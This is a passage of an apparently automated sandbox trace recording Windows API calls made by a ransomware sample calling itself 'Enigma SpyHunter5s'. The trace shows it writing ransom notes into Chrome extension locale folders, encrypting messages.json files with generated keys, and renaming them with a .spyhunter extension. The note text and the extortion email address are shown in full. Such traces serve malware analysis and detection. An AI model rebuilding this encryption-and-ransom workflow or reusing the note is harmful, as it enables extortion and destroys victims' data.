halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.167] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.167] WriteFile (in: hFile=0xb0, lpBuffer=0x248ebaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecd8, lpOverlapped=0x0 | out: lpBuffer=0x248ebaf*, lpNumberOfBytesWritten=0x248ecd8*=0x127, lpOverlapped=0x0) returned 1 [0157.263] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.263] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecd8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecd8*=0x2ac, lpOverlapped=0x0) returned 1 [0157.263] CloseHandle (hObject=0xb0) returned 1 [0157.264] GetProcessHeap () returned 0x2c0000 [0157.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb8ba0 | out: hHeap=0x2c0000) returned 1 [0157.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.265] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.265] WriteFile (in: hFile=0xb0, lpBuffer=0x248ebab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x248ebab*, lpNumberOfBytesWritten=0x248ecd4*=0x127, lpOverlapped=0x0) returned 1 [0157.271] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.271] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecd4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecd4*=0x2ac, lpOverlapped=0x0) returned 1 [0157.271] CloseHandle (hObject=0xb0) returned 1 [0157.271] GetProcessHeap () returned 0x2c0000 [0157.271] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe3ee8 | out: hHeap=0x2c0000) returned 1 [0157.271] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.272] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.272] WriteFile (in: hFile=0xb0, lpBuffer=0x248eba7*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecd0, lpOverlapped=0x0 | out: lpBuffer=0x248eba7*, lpNumberOfBytesWritten=0x248ecd0*=0x127, lpOverlapped=0x0) returned 1 [0157.273] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.273] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecd0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecd0*=0x2ac, lpOverlapped=0x0) returned 1 [0157.273] CloseHandle (hObject=0xb0) returned 1 [0157.274] GetProcessHeap () returned 0x2c0000 [0157.274] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3007760 | out: hHeap=0x2c0000) returned 1 [0157.274] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec70 | out: pbBuffer=0x248ec70) returned 1 [0157.274] GetProcessHeap () returned 0x2c0000 [0157.274] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.274] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec68*=0x30) returned 1 [0157.274] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.275] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json") returned 164 [0157.275] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.275] GetProcessHeap () returned 0x2c0000 [0157.275] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.275] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec2c*=0x2800, lpOverlapped=0x0) returned 1 [0157.295] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.295] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec2c*=0x2800, lpOverlapped=0x0) returned 1 [0157.295] GetProcessHeap () returned 0x2c0000 [0157.295] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.295] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.296] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec2c, lpOverlapped=0x0 | out: lpBuffer=0x248ec6c*, lpNumberOfBytesWritten=0x248ec2c*=0x4, lpOverlapped=0x0) returned 1 [0157.296] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec2c*=0x30, lpOverlapped=0x0) returned 1 [0157.296] CloseHandle (hObject=0xb0) returned 1 [0157.296] GetProcessHeap () returned 0x2c0000 [0157.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.296] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.spyhunter") returned 174 [0157.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\messages.json.spyhunter")) returned 1 [0157.297] GetProcessHeap () returned 0x2c0000 [0157.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.297] GetProcessHeap () returned 0x2c0000 [0157.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.297] GetProcessHeap () returned 0x2c0000 [0157.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30075c8 | out: hHeap=0x2c0000) returned 1 [0157.297] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.298] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.298] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb9f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecc8, lpOverlapped=0x0 | out: lpBuffer=0x248eb9f*, lpNumberOfBytesWritten=0x248ecc8*=0x127, lpOverlapped=0x0) returned 1 [0157.299] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.299] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecc8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecc8*=0x2ac, lpOverlapped=0x0) returned 1 [0157.299] CloseHandle (hObject=0xb0) returned 1 [0157.299] GetProcessHeap () returned 0x2c0000 [0157.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006dd0 | out: hHeap=0x2c0000) returned 1 [0157.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec68 | out: pbBuffer=0x248ec68) returned 1 [0157.299] GetProcessHeap () returned 0x2c0000 [0157.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.300] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec60*=0x30) returned 1 [0157.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.300] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0157.300] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.300] GetProcessHeap () returned 0x2c0000 [0157.300] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.300] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec24*=0x2800, lpOverlapped=0x0) returned 1 [0157.325] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.325] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248ec24*=0x2800, lpOverlapped=0x0) returned 1 [0157.325] GetProcessHeap () returned 0x2c0000 [0157.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0157.326] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.326] WriteFile (in: hFile=0xb0, lpBuffer=0x248ec64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248ec24, lpOverlapped=0x0 | out: lpBuffer=0x248ec64*, lpNumberOfBytesWritten=0x248ec24*=0x4, lpOverlapped=0x0) returned 1 [0157.326] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248ec24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248ec24*=0x30, lpOverlapped=0x0) returned 1 [0157.326] CloseHandle (hObject=0xb0) returned 1 [0157.326] GetProcessHeap () returned 0x2c0000 [0157.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.326] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.spyhunter") returned 174 [0157.326] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.spyhunter")) returned 1 [0157.327] GetProcessHeap () returned 0x2c0000 [0157.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.328] GetProcessHeap () returned 0x2c0000 [0157.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0157.328] GetProcessHeap () returned 0x2c0000 [0157.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006c38 | out: hHeap=0x2c0000) returned 1 [0157.328] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.329] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.329] WriteFile (in: hFile=0xb0, lpBuffer=0x248eb97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248ecc0, lpOverlapped=0x0 | out: lpBuffer=0x248eb97*, lpNumberOfBytesWritten=0x248ecc0*=0x127, lpOverlapped=0x0) returned 1 [0157.329] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.330] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248ecc0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248ecc0*=0x2ac, lpOverlapped=0x0) returned 1 [0157.330] CloseHandle (hObject=0xb0) returned 1 [0157.330] GetProcessHeap () returned 0x2c0000 [0157.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006110 | out: hHeap=0x2c0000) returned 1 [0157.330] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248ec60 | out: pbBuffer=0x248ec60) returned 1 [0157.330] GetProcessHeap () returned 0x2c0000 [0157.330] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0157.330] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248ec58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248ec58*=0x30) returned 1 [0157.330] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0157.331] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0157.331] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.331] GetProcessHeap () returned 0x2c0000 [0157.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0157.331] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248ec1c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248ec1c*=0x2800, lpOverlapped=0x0) returned 1 [0157.338] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.338] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, 